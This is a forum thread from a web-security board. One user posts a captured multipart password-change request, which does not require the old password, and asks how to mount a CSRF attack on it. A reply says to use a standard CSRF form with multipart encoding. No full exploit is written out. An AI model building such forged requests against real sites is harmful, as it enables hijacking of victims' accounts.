Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
CSRF
Posted by: Bob
Date: June 18, 2013 08:06AM

I'm aware of traditional csrf but i'm not sure how to do this.
I have monitored the process when changing passwords (the old password is not required) and was able to capture the following:
Host: www.example.com
User-Agent:xxx/1.0 (xx xx 9.2; rv:30.0) L/39483 example/282.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.example.com/forums/profile/edit.html
Cookie: __cfduid=c785f77dc868d9fe17b119ad0e3eac2991371422067; d17abfb453ek8801d2cd917536ac8bd7=595B+5+A4A1758+85C461142+14A+B59+E5111+P1159+6+7137814124B105A15+259+D1241+5114311+B165546+316+252+C+916+451+6+1+7+154597940+C1753138995E541040+B1B; a65d776dedkk5dccb94f98e7e93b1d448=e68jop28oe7oimevc36e7fvds9; currentURI=http%3A%2F%2Fwww.example.com%2Fcomponent%2Fcommunity%2F; activeProfile=5834
X-Forwarded-For: example
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------176632722112932
Content-Length: 3674

Post content:
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="name"\r\n
\r\n
example\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="email"\r\n
\r\n
example@example.com\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
mypassword!\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="password2"\r\n
\r\n
mypassword!\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="personaltext"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="birthdate1"\r\n
\r\n
0001\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="birthdate2"\r\n
\r\n
01\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="birthdate3"\r\n
\r\n
01\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="location"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="gender"\r\n
\r\n
0\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="websitename"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="websiteurl"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="twitter"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="facebook"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="myspace"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="skype"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="linkedin"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="delicious"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="friendfeed"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="digg"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="yim"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="aim"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="gtalk"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="icq"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="msn"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="blogspot"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="flickr"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="bebo"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="signature"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="messageordering"\r\n
\r\n
0\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="hidemail"\r\n
\r\n
1\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="showonline"\r\n
\r\n
1\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="option"\r\n
\r\n
lmb\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="func"\r\n
\r\n
profile\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="do"\r\n
\r\n
save\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="a5dc770aed01a387d9595329b475n26b3"\r\n
\r\n
1\r\n
-----------------------------176632722112932--\r\n

Options: ReplyQuote
Re: CSRF
Posted by: Albino
Date: August 23, 2013 10:38AM

This is just like typical CSRF, except you need enctype='multipart/form-data' in your payload form.

-------------------------------------------------------
Research blog

Options: ReplyQuote


Sorry, only registered users may post in this forum.